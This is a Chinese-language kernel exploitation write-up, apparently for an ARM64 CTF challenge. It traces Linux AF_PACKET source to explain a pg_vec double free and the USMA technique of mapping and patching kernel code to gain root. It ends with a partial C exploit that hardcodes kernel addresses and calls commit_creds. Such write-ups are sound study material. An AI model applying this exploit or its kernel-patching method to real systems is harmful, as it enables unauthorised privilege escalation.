1 2 3 4 5 6 7 8 9 10 11 static char *alloc_one_pg_vec_page (unsigned long order) { char *buffer; gfp_t gfp_flags = GFP_KERNEL | __GFP_COMP | __GFP_ZERO | __GFP_NOWARN | __GFP_NORETRY; buffer = (char *) __get_free_pages(gfp_flags, order); if (buffer) return buffer; }
相应地, pgv 中的页面也会在 socket 被关闭后释放:
1 2 3 packet_release() packet_set_ring() free_pg_vec()
setsockopt() 也可以帮助我们完成页级堆风水 ,当我们耗尽 buddy system 中的 low order pages 后,我们再请求的页面便都是物理连续的,因此此时我们再进行 setsockopt() 便相当于获取到了一块近乎物理连续的内存 (为什么是”近乎连续“是因为大量的 setsockopt() 流程中同样会分配大量我们不需要的结构体,从而消耗 buddy system 的部分页面)。
exp Page-level UAF 利用思路 exp Dirty Pagetable 利用思路 exp USMA 这题我们以ARM64的内核为例。
socket系统调用
先了解一下socket系统调用的创建的一个过程。socket用于创建网络套接字,这个套接字可以发送和接收数据。具体使用如下
1 2 3 4 5 6 7 8 9 10 11 int socket (int family, int type, int protocol) ;socket(AF_INET, SOCK_STREAM, 0 );
socket()调用使用sock_create()创建套接字,并使用sock_map_fd()返回相应的文件描述符。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 int __sys_socket(int family, int type, int protocol){ int retval; struct socket *sock ; int flags; retval = sock_create(family, type, protocol, &sock); if (retval < 0 ) return retval; return sock_map_fd(sock, flags & (O_CLOEXEC | O_NONBLOCK)); }
sock_create()创建套接字,会调用sock_create()->__sock_create(),首先通过sock_alloc()分配socket结构体,然后通过传入的family获取协议模块,在通过协议模块的ops(pf->create),来初始化socket。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 int sock_create (int family, int type, int protocol, struct socket **res) { return __sock_create(current->nsproxy->net_ns, family, type, protocol, res, 0 ); } int __sock_create(struct net *net, int family, int type, int protocol, struct socket **res, int kern) { int err; struct socket *sock ; const struct net_proto_family *pf ; sock = sock_alloc(); if (!sock) { net_warn_ratelimited("socket: no more sockets\n" ); return -ENFILE; } sock->type = type; rcu_read_lock(); pf = rcu_dereference(net_families[family]); err = -EAFNOSUPPORT; if (!pf) goto out_release; if (!try_module_get(pf->owner)) goto out_release; rcu_read_unlock(); err = pf->create(net, sock, protocol, kern); if (err < 0 ) goto out_module_put; *res = sock; return 0 ; }
在根据传入的family获取协议模块的时候,通过交叉索引找到sock_register()为相应net_families[]的注册函数
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 int sock_register (const struct net_proto_family *ops) { int err; if (ops->family >= NPROTO) { pr_crit("protocol %d >= NPROTO(%d)\n" , ops->family, NPROTO); return -ENOBUFS; } spin_lock(&net_family_lock); if (rcu_dereference_protected(net_families[ops->family], lockdep_is_held(&net_family_lock))) err = -EEXIST; else { rcu_assign_pointer(net_families[ops->family], ops); err = 0 ; } spin_unlock(&net_family_lock); pr_info("NET: Registered protocol family %d\n" , ops->family); return err; }
在net/packet/af_packet.c中找到注册函数的调用,这里family为PF_PACKET,同时create为packet_create(),继续分析create函数
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 static const struct net_proto_family packet_family_ops = { .family = PF_PACKET, .create = packet_create, .owner = THIS_MODULE, }; static int __init packet_init (void ) { int rc; rc = sock_register(&packet_family_ops); if (rc) goto out_proto; return 0 ; }
packet_create()会先对套接字的type做检查,然后使用sk_alloc分配独立的object,函数指针(ops)的赋值需要注意,之后就是数据包和一些锁、钩子等操作。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 static int packet_create (struct net *net, struct socket *sock, int protocol, int kern) { struct sock *sk ; struct packet_sock *po ; __be16 proto = (__force __be16)protocol; int err; if (!ns_capable(net->user_ns, CAP_NET_RAW)) return -EPERM; if (sock->type != SOCK_DGRAM && sock->type != SOCK_RAW && sock->type != SOCK_PACKET) return -ESOCKTNOSUPPORT; sock->state = SS_UNCONNECTED; err = -ENOBUFS; sk = sk_alloc(net, PF_PACKET, GFP_KERNEL, &packet_proto, kern); if (sk == NULL ) goto out; sock->ops = &packet_ops; if (sock->type == SOCK_PACKET) sock->ops = &packet_ops_spkt; sock_init_data(sock, sk); po = pkt_sk(sk); init_completion(&po->skb_completion); sk->sk_family = PF_PACKET; po->num = proto; po->xmit = dev_queue_xmit; } static const struct proto_ops packet_ops = { .family = PF_PACKET, .owner = THIS_MODULE, .release = packet_release, .bind = packet_bind, .connect = sock_no_connect, .socketpair = sock_no_socketpair, .accept = sock_no_accept, .getname = packet_getname, .poll = packet_poll, .ioctl = packet_ioctl, .gettstamp = sock_gettstamp, .listen = sock_no_listen, .shutdown = sock_no_shutdown, .setsockopt = packet_setsockopt, .getsockopt = packet_getsockopt, .sendmsg = packet_sendmsg, .recvmsg = packet_recvmsg, .mmap = packet_mmap, .sendpage = sock_no_sendpage, };
基本了解了socket创建和初始化的过程之后,我们进一步了解漏洞的产生原因。
setsockopt
允许开发者灵活配置套接字的行为,以满足应用程序的更多特定需求。具体调用参数如下:
1 2 3 4 5 6 7 8 9 10 11 int setsockopt (int sockfd, int level, int optname, const void *optval, socklen_t optlen) ;sockfd = socket(AF_INET, SOCK_STREAM, 0 ); setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof (opt)) __sys_setsockopt()
SOL_SOCKET套接字层,进行调用sock_setsockopt()
其他层,调用sock->ops->setsockopt的指针函数
我们需要的是调用sock->ops->setsockopt,所以需要设置level不是SOL_SOCKET
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 int __sys_setsockopt(int fd, int level, int optname, char __user *user_optval, int optlen) { sockptr_t optval = USER_SOCKPTR(user_optval); char *kernel_optval = NULL ; int err, fput_needed; struct socket *sock ; if (optlen < 0 ) return -EINVAL; sock = sockfd_lookup_light(fd, &err, &fput_needed); if (!sock) return err; if (level == SOL_SOCKET && !sock_use_custom_sol_socket(sock)) err = sock_setsockopt(sock, level, optname, optval, optlen); else if (unlikely(!sock->ops->setsockopt)) err = -EOPNOTSUPP; else err = sock->ops->setsockopt(sock, level, optname, optval, optlen); return err; }
sock->ops==packet_ops调用packet_setsockopt(),通过该optname提供了一个菜单的选项,主要关注环形缓冲区处理的时候,会先根据版本来确定长度后复制数据到一环上,然后进而设置环形缓冲区。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 static int packet_setsockopt (struct socket *sock, int level, int optname, sockptr_t optval, unsigned int optlen) { struct sock *sk = sock->sk; struct packet_sock *po = pkt_sk(sk); int ret; if (level != SOL_PACKET) return -ENOPROTOOPT; switch (optname) { case PACKET_RX_RING: case PACKET_TX_RING: { union tpacket_req_u req_u ; int len; lock_sock(sk); switch (po->tp_version) { case TPACKET_V1: case TPACKET_V2: len = sizeof (req_u.req); break ; case TPACKET_V3: default : len = sizeof (req_u.req3); break ; } if (optlen < len) { ret = -EINVAL; } else { if (copy_from_sockptr(&req_u.req, optval, len)) ret = -EFAULT; else ret = packet_set_ring(sk, &req_u, 0 , optname == PACKET_TX_RING); } release_sock(sk); return ret; } }
packet socket模块,可以让用户在设备驱动层接受和发送raw packets,并且为了加速数据报文的拷贝,它允许用户创建一块与内核态共享的环形缓冲区。具体的创建操作是在packet_set_ring()函数中实现的。
进行跟进packet_set_ring(),首先会各种各样的初始化操作,主要点在TPACKET_V3版本的时候,调用init_prb_bdqc()初始化的时候, packet_ring_buffer.prb_bdqc.pkbdq持有一个pg_vec引用,并且后期释放pg_vec并没有清除引用,导致可以double free。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 struct pgv { char *buffer; }; struct packet_ring_buffer { struct pgv *pg_vec ; unsigned int head; unsigned int frames_per_block; unsigned int frame_size; unsigned int frame_max; unsigned int pg_vec_order; unsigned int pg_vec_pages; unsigned int pg_vec_len; unsigned int __percpu *pending_refcnt; union { unsigned long *rx_owner_map; struct tpacket_kbdq_core prb_bdqc ; }; }; static int packet_set_ring (struct sock *sk, union tpacket_req_u *req_u, int closing, int tx_ring) { struct pgv *pg_vec = NULL ; struct packet_sock *po = pkt_sk(sk); unsigned long *rx_owner_map = NULL ; int was_running, order = 0 ; struct packet_ring_buffer *rb ; struct sk_buff_head *rb_queue ; __be16 num; int err; struct tpacket_req *req = &req_u->req; rb = tx_ring ? &po->tx_ring : &po->rx_ring; rb_queue = tx_ring ? &sk->sk_write_queue : &sk->sk_receive_queue; err = -EBUSY; if (!closing) { if (atomic_read (&po->mapped)) goto out; if (packet_read_pending(rb)) goto out; } if (req->tp_block_nr) { unsigned int min_frame_size; err = -EBUSY; if (unlikely(rb->pg_vec)) goto out; switch (po->tp_version) { case TPACKET_V1: po->tp_hdrlen = TPACKET_HDRLEN; break ; case TPACKET_V2: po->tp_hdrlen = TPACKET2_HDRLEN; break ; case TPACKET_V3: po->tp_hdrlen = TPACKET3_HDRLEN; break ; } err = -EINVAL; if (unlikely((int )req->tp_block_size <= 0 )) goto out; if (unlikely(!PAGE_ALIGNED(req->tp_block_size))) goto out; min_frame_size = po->tp_hdrlen + po->tp_reserve; if (po->tp_version >= TPACKET_V3 && req->tp_block_size < BLK_PLUS_PRIV((u64)req_u->req3.tp_sizeof_priv) + min_frame_size) goto out; if (unlikely(req->tp_frame_size < min_frame_size)) goto out; if (unlikely(req->tp_frame_size & (TPACKET_ALIGNMENT - 1 ))) goto out; rb->frames_per_block = req->tp_block_size / req->tp_frame_size; if (unlikely(rb->frames_per_block == 0 )) goto out; if (unlikely(rb->frames_per_block > UINT_MAX / req->tp_block_nr)) goto out; if (unlikely((rb->frames_per_block * req->tp_block_nr) != req->tp_frame_nr)) goto out; err = -ENOMEM; order = get_order(req->tp_block_size); pg_vec = alloc_pg_vec(req, order); if (unlikely(!pg_vec)) goto out; switch (po->tp_version) { case TPACKET_V3: if (!tx_ring) { init_prb_bdqc(po, rb, pg_vec, req_u); } else { struct tpacket_req3 *req3 = &req_u->req3; if (req3->tp_retire_blk_tov || req3->tp_sizeof_priv || req3->tp_feature_req_word) { err = -EINVAL; goto out_free_pg_vec; } } break ; default : if (!tx_ring) { rx_owner_map = bitmap_alloc(req->tp_frame_nr, GFP_KERNEL | __GFP_NOWARN | __GFP_ZERO); if (!rx_owner_map) goto out_free_pg_vec; } break ; } } else { err = -EINVAL; if (unlikely(req->tp_frame_nr)) goto out; } spin_lock(&po->bind_lock); was_running = po->running; num = po->num; if (was_running) { po->num = 0 ; __unregister_prot_hook(sk, false ); } spin_unlock(&po->bind_lock); synchronize_net(); err = -EBUSY; mutex_lock(&po->pg_vec_lock); if (closing || atomic_read (&po->mapped) == 0 ) { err = 0 ; spin_lock_bh(&rb_queue->lock); swap(rb->pg_vec, pg_vec); if (po->tp_version <= TPACKET_V2) swap(rb->rx_owner_map, rx_owner_map); } out_free_pg_vec: bitmap_free(rx_owner_map); if (pg_vec) free_pg_vec(pg_vec, order, req->tp_block_nr); out: return err; }
先进行释放pg_vec的操作,但是packet_ring_buffer.prb_bdqc.pkbdq仍然持有被释放pg_vec,然后将packet socket的版本切换为TPACKET_V2并且再次设置缓冲区的时候,原本保存在pkbdq的pg_vec会被当做rx_owner_map再次释放,造成double free,因为在rx_owner_map和prb_bdqc为一个联合体,这里的rx_owner_map偏移为0,而pkbdq的偏移也是为0。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 struct packet_ring_buffer { struct pgv * pg_vec ; unsigned int head; unsigned int frames_per_block; unsigned int frame_size; unsigned int frame_max; unsigned int pg_vec_order; unsigned int pg_vec_pages; unsigned int pg_vec_len; unsigned int * pending_refcnt; union { long unsigned int * rx_owner_map; struct tpacket_kbdq_core prb_bdqc ; }; }; struct tpacket_kbdq_core { struct pgv * pkbdq ; unsigned int feature_req_word; unsigned int hdrlen; };
并且在alloc_pg_vec()中发现申请的pg_vec大小为我们可控(block_nr),因此我们可以申请得到几乎任意大小的堆块。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 static struct pgv *alloc_pg_vec (struct tpacket_req *req, int order) { unsigned int block_nr = req->tp_block_nr; struct pgv *pg_vec ; int i; pg_vec = kcalloc(block_nr, sizeof (struct pgv), GFP_KERNEL | __GFP_NOWARN); if (unlikely(!pg_vec)) goto out; for (i = 0 ; i < block_nr; i++) { pg_vec[i].buffer = alloc_one_pg_vec_page(order); if (unlikely(!pg_vec[i].buffer)) goto out_free_pgvec; } out: return pg_vec; }
了解漏洞的产生原因,进一步了解如何利用pg_vec。
mmap
mmap调用链sys_mmap()->ksys_mmap_pgoff()。ksys_mmap_pgoff()主要是针对大页映射的一个预处理,之后调用vm_mmap_pgoff().
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 unsigned long ksys_mmap_pgoff (unsigned long addr, unsigned long len, unsigned long prot, unsigned long flags, unsigned long fd, unsigned long pgoff) { struct file *file = NULL ; unsigned long retval; if (!(flags & MAP_ANONYMOUS)) { audit_mmap_fd(fd, flags); file = fget(fd); if (!file) return -EBADF; if (is_file_hugepages(file)) { len = ALIGN(len, huge_page_size(hstate_file(file))); } else if (unlikely(flags & MAP_HUGETLB)) { retval = -EINVAL; goto out_fput; } } else if (flags & MAP_HUGETLB) { struct user_struct *user = NULL ; struct hstate *hs ; hs = hstate_sizelog((flags >> MAP_HUGE_SHIFT) & MAP_HUGE_MASK); if (!hs) return -EINVAL; len = ALIGN(len, huge_page_size(hs)); file = hugetlb_file_setup(HUGETLB_ANON_FILE, len, VM_NORESERVE, &user, HUGETLB_ANONHUGE_INODE, (flags >> MAP_HUGE_SHIFT) & MAP_HUGE_MASK); if (IS_ERR(file)) return PTR_ERR(file); } flags &= ~(MAP_EXECUTABLE | MAP_DENYWRITE); retval = vm_mmap_pgoff(file, addr, len, prot, flags, pgoff); out_fput: if (file) fput(file); return retval; }
vm_mmap_pgoff(),会对虚拟内存空间先上写锁,然后调用do_mmap()进一步完成映射。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 unsigned long vm_mmap_pgoff (struct file *file, unsigned long addr, unsigned long len, unsigned long prot, unsigned long flag, unsigned long pgoff) { unsigned long ret; struct mm_struct *mm = current->mm; unsigned long populate; LIST_HEAD(uf); ret = security_mmap_file(file, prot, flag); if (!ret) { if (mmap_write_lock_killable(mm)) return -EINTR; ret = do_mmap(file, addr, len, prot, flag, pgoff, &populate, &uf); mmap_write_unlock(mm); userfaultfd_unmap_complete(mm, &uf); if (populate) mm_populate(ret, populate); } return ret; }
在do_mmap()映射的时候主要选择查看文件匿名映射的一个过程。首先就是各种检查然后对映射方式进行选择之后调用核心函数mmap_region()进行映射。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 unsigned long do_mmap (struct file *file, unsigned long addr, unsigned long len, unsigned long prot, unsigned long flags, unsigned long pgoff, unsigned long *populate, struct list_head *uf) { struct mm_struct *mm = current->mm; vm_flags_t vm_flags; int pkey = 0 ; *populate = 0 ; if (mm->map_count > sysctl_max_map_count) return -ENOMEM; addr = get_unmapped_area(file, addr, len, pgoff, flags); if (IS_ERR_VALUE(addr)) return addr; vm_flags = calc_vm_prot_bits(prot, pkey) | calc_vm_flag_bits(flags) | mm->def_flags | VM_MAYREAD | VM_MAYWRITE | VM_MAYEXEC; if (flags & MAP_LOCKED) if (!can_do_mlock()) return -EPERM; if (mlock_future_check(mm, vm_flags, len)) return -EAGAIN; if (file) { struct inode *inode = file_inode(file); switch (flags & MAP_TYPE) { case MAP_PRIVATE: if (!(file->f_mode & FMODE_READ)) return -EACCES; if (path_noexec(&file->f_path)) { if (vm_flags & VM_EXEC) return -EPERM; vm_flags &= ~VM_MAYEXEC; } if (!file->f_op->mmap) return -ENODEV; if (vm_flags & (VM_GROWSDOWN|VM_GROWSUP)) return -EINVAL; break ; default : return -EINVAL; } } if (flags & MAP_NORESERVE) { if (sysctl_overcommit_memory != OVERCOMMIT_NEVER) vm_flags |= VM_NORESERVE; if (file && is_file_hugepages(file)) vm_flags |= VM_NORESERVE; } addr = mmap_region(file, addr, len, vm_flags, pgoff, uf); if (!IS_ERR_VALUE(addr) && ((vm_flags & VM_LOCKED) || (flags & (MAP_POPULATE | MAP_NONBLOCK)) == MAP_POPULATE)) *populate = len; return addr; }
mmap_region()函数时,还是主要关心文件映射。映射的时候如果flags有MAP_FIXED,那就会强制映射该地址,但是可能会有映射重叠。就会先做一个是否能于其他vma合并的一个操作,如果可以合并就返回,不能合并就重新申请object来存储vma结构体,vma初始化之后,进入文件映射,会先将文件与虚拟内存管理,之后调用file自带的ops进行映射,最后将vma插入到管理的红黑树中,并对vma和文件做反向关联。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 unsigned long mmap_region (struct file *file, unsigned long addr, unsigned long len, vm_flags_t vm_flags, unsigned long pgoff, struct list_head *uf) { struct mm_struct *mm = current->mm; struct vm_area_struct *vma , *prev , *merge ; int error; struct rb_node **rb_link , *rb_parent ; unsigned long charged = 0 ; if (!may_expand_vm(mm, vm_flags, len >> PAGE_SHIFT)) { unsigned long nr_pages; nr_pages = count_vma_pages_range(mm, addr, addr + len); if (!may_expand_vm(mm, vm_flags, (len >> PAGE_SHIFT) - nr_pages)) return -ENOMEM; } if (munmap_vma_range(mm, addr, len, &prev, &rb_link, &rb_parent, uf)) return -ENOMEM; vma = vma_merge(mm, prev, addr, addr + len, vm_flags, NULL , file, pgoff, NULL , NULL_VM_UFFD_CTX); if (vma) goto out; vma = vm_area_alloc(mm); if (!vma) { error = -ENOMEM; goto unacct_error; } vma->vm_start = addr; vma->vm_end = addr + len; vma->vm_flags = vm_flags; vma->vm_page_prot = vm_get_page_prot(vm_flags); vma->vm_pgoff = pgoff; if (file) { vma->vm_file = get_file(file); error = call_mmap(file, vma); if (error) goto unmap_and_free_vma; addr = vma->vm_start; vm_flags = vma->vm_flags; } vma_link(mm, vma, prev, rb_link, rb_parent); file = vma->vm_file; return addr; }
在最开始的socket介绍中知道packet_ops调用的ops->mmap为packet_mmap(),packet_mmap()会将pg_vec中的pages对应的物理页面与用户程序的vma绑定,也就是将网络数据包的接收和发送缓冲区映射到用户空间。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 static int packet_mmap (struct file *file, struct socket *sock, struct vm_area_struct *vma) { start = vma->vm_start; for (rb = &po->rx_ring; rb <= &po->tx_ring; rb++) { if (rb->pg_vec == NULL ) continue ; for (i = 0 ; i < rb->pg_vec_len; i++) { struct page *page ; void *kaddr = rb->pg_vec[i].buffer; int pg_num; for (pg_num = 0 ; pg_num < rb->pg_vec_pages; pg_num++) { page = pgv_to_page(kaddr); err = vm_insert_page(vma, start, page); if (unlikely(err)) goto out; start += PAGE_SIZE; kaddr += PAGE_SIZE; } } } return err; }
mmap的时候可以映射socket的环形缓冲区到用户态,环形缓冲区在setsockopt的时候用pg_vec构造,使用GPF_KERNEL来申请的object,并且大小可控,这个时候通过堆块的漏洞去控制pg_vec的虚拟地址,然后再映射到用户态就可以对任意内核地址的控制。
调用链:vm_insert_page()->insert_page()->validate_page_before_insert()的时候会对page进行检查,检查page 是否为匿名页,是否为子系统分配的页,是否含有type。
1 2 3 4 5 6 7 8 9 10 11 12 static int validate_page_before_insert (struct page *page) { if (PageAnon(page) || PageSlab(page) || page_has_type(page)) return -EINVAL; flush_dcache_page(page); return 0 ; } static inline int page_has_type (struct page *page) { return (int )page->page_type < PAGE_MAPCOUNT_RESERVE; }
内存页的type为以下四种。
1 2 3 4 5 6 #define PAGE_MAPCOUNT_RESERVE -128 #define PG_buddy 0x00000080 #define PG_offline 0x00000100 #define PG_table 0x00000200 #define PG_guard 0x00000400
如果传入的page为内核代码的页,以上检查都可以绕过,就可以利用pg_vec修改内核代码段,这个时候传入__sys_setresuid/SyS_setresuid的内核代码页的虚拟地址,然后对逻辑判断处改为jmp/bl跳转就可以完成提权。
1 2 3 4 5 6 7 8 9 10 11 if ( !ns_capable(old->user_ns, 7 ) ) { if ( ruid_1 != -1 && ruid_1 != old->uid.val && ruid_1 != old->euid.val && (fixed_1 = -1 , ruid_1 != old->suid.val) || euid_1 != -1 && euid_1 != old->uid.val && euid_1 != old->euid.val && (fixed_1 = -1 , euid_1 != old->suid.val) || suid_1 != -1 && suid_1 != old->uid.val && suid_1 != old->euid.val && (fixed_1 = -1 , suid_1 != old->suid.val) ) { LABEL_24: abort_creds(new); return fixed_1; } }
利用思路 总结
setsockopt()调用packet_set_ring()时,版本为TPACKET_V3会通过init_prb_bdqc()对接收环进行初始化时,packet_ring_buffer.prb_bdqc.pkbdq持有一个pg_vec引用,并且后期释放操作并没有对该位置进行清除。进而版本转换为TPACKET_V2时,rx_owner_map和prb_bdqc为一个联合体,并且偏移一致,导致残留的pg_vec会变成rx_owner_map指针,导致最后释放操作的时候,造成doble free。
调用socket创建套接字,family为AF_PACKET,type为SOCK_RAW。
调用TPACKET_V3的setsockopt,创建环形缓冲区。
再次调用setsockopt,版本号还是TPACKET_V3,设置req->tp_block_nr为0,会释放第一次申请的缓冲区。
使用堆喷等手法申请回释放的pg_vec
调用TPACKET_V2的setsockopt,实现double free
劫持pg_vec指向内核地址,然后 patch 内核即可。
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 #ifndef _GNU_SOURCE #define _GNU_SOURCE #endif #include <stddef.h> #include <stdint.h> #include <inttypes.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <ctype.h> #include <unistd.h> #include <fcntl.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/mman.h> #include <sys/ioctl.h> #include <sys/auxv.h> #include <sys/wait.h> #include <sys/sysinfo.h> #include <sys/param.h> #include <sys/socket.h> #include <sys/xattr.h> #include <arpa/inet.h> #include <net/if.h> #include <net/ethernet.h> #include <linux/if_packet.h> #include <pthread.h> #include <semaphore.h> #include <poll.h> #include <sched.h> #include <syscall.h> struct param { size_t len; size_t *buf; long long idx; }; void *(*prepare_kernel_cred)(void *) = (void *)0xFFFFFFC0000BEB60 ;void *(*commit_creds)(void *) = (void *)0xFFFFFFC0000BE5A0 ;void *(*set_memory_rw)(void * addr, int numpages) = (void *)0xFFFFFFC000095360 ;size_t SyS_setresuid_page_offset = 0xD50 ;size_t SyS_setresuid_page_base = 0xFFFFFFC0000B0C90 & ~0xFFF ;size_t init_cred = 0xFFFFFFC0008EA998 ;size_t ret_to_usr = 0xFFFFFFC000085554 ;size_t modprobe_path = 0xFFFFFFC0008E9A40 ;#define BOF_MALLOC 5 #define BOF_FREE 7 #define BOF_WRITE 8 #define BOF_READ 9 void alloc_buf (int fd, struct param* p) { printf ("[+] kmalloc len:%lu idx:%lld\n" , p->len, p->idx); ioctl(fd, BOF_MALLOC, p); } void free_buf (int fd, struct param* p) { printf ("[+] kfree len:%lu idx:%lld\n" , p->len, p->idx); ioctl(fd, BOF_FREE, p); } void read_buf (int fd, struct param* p) { printf ("[+] copy_to_user len:%lu idx:%lld\n" , p->len, p->idx); ioctl(fd, BOF_READ, p); } void write_buf (int fd, struct param* p) { printf ("[+] copy_from_user len:%lu idx:%lld\n" , p->len, p->idx); ioctl(fd, BOF_WRITE, p); } void get_shell () { char * flag = "/flag" ; char buffer[0x20 ] = {0 }; int fd = open(flag, O_RDWR); read(fd, buffer, 0x20 ); printf ("[*] flag: %s\n" , buffer); close(fd); exit (0 ); } size_t user_sp, user_pc;void save_status () { __asm__ volatile ( "mov %0, sp\n\t" : "=r" (user_sp) : : "memory" ) ; user_pc = (size_t )get_shell; printf ("[*] Saved SP: %p\n" , (void *)user_sp); } void get_root () { commit_creds(prepare_kernel_cred(0 )); __asm__ volatile ( "mov x0, #0x0\n" "mov x1, #0x3c0\n" "msr spsr_el1, x1\n" "msr sp_el0, %0\n" "msr elr_el1, %1\n" "eret\n" : : "r" (user_sp), "r" (user_pc) : "memory" ) ;} #define NONE "\033[m" #define RED "\033[0;32;31m" #define LIGHT_RED "\033[1;31m" #define GREEN "\033[0;32;32m" #define LIGHT_GREEN "\033[1;32m" #define BLUE "\033[0;32;34m" #define LIGHT_BLUE "\033[1;34m" #define DARY_GRAY "\033[1;30m" #define CYAN "\033[0;36m" #define LIGHT_CYAN "\033[1;36m" #define PURPLE "\033[0;35m" #define LIGHT_PURPLE "\033[1;35m" #define BROWN "\033[0;33m" #define YELLOW "\033[1;33m" #define LIGHT_GRAY "\033[0;37m" #define WHITE "\033[1;37m" void qword_dump (char *desc, void *addr, int len) { uint64_t *buf64 = (uint64_t *) addr; uint8_t *buf8 = (uint8_t *) addr; if (desc != NULL ) { printf (BROWN "[*] %s:\n" NONE, desc); } for (int i = 0 ; i < len / 8 ; i += 4 ) { printf (" %04x" , i * 8 ); for (int j = 0 ; j < 4 ; j++) { i + j < len / 8 ? printf (" 0x%016lx" , buf64[i + j]) : printf (" " ); } printf (" " ); for (int j = 0 ; j < 32 && j + i * 8 < len; j++) { printf ("%c" , isprint (buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.' ); } puts ("" ); } } #define PACKET_RX_RING 5 #define PACKET_VERSION 10 #define PACKET_TX_RING 13 void packet_socket_rx_ring_init (int s, unsigned int block_size, unsigned int frame_size, unsigned int block_nr, unsigned int sizeof_priv, unsigned int timeout) { int v = TPACKET_V3; int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof (v)); if (rv < 0 ) { puts ("[X] setsockopt(PACKET_VERSION)" ); exit (-1 ); } struct tpacket_req3 req ; memset (&req, 0 , sizeof (req)); req.tp_block_size = block_size; req.tp_frame_size = frame_size; req.tp_block_nr = block_nr; req.tp_frame_nr = (block_size * block_nr) / frame_size; req.tp_retire_blk_tov = timeout; req.tp_sizeof_priv = sizeof_priv; req.tp_feature_req_word = 0 ; rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof (req)); if (rv < 0 ) { puts ("setsockopt(PACKET_RX_RING)" ); exit (-1 ); } } int packet_socket_setup (unsigned int block_size, unsigned int frame_size, unsigned int block_nr, unsigned int sizeof_priv, int timeout) { int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); if (s < 0 ) { puts ("socket(AF_PACKET)" ); exit (-1 ); } packet_socket_rx_ring_init(s, block_size, frame_size, block_nr, sizeof_priv, timeout); struct sockaddr_ll sa ; memset (&sa, 0 , sizeof (sa)); sa.sll_family = PF_PACKET; sa.sll_protocol = htons(ETH_P_ALL); sa.sll_ifindex = if_nametoindex("lo" ); sa.sll_hatype = 0 ; 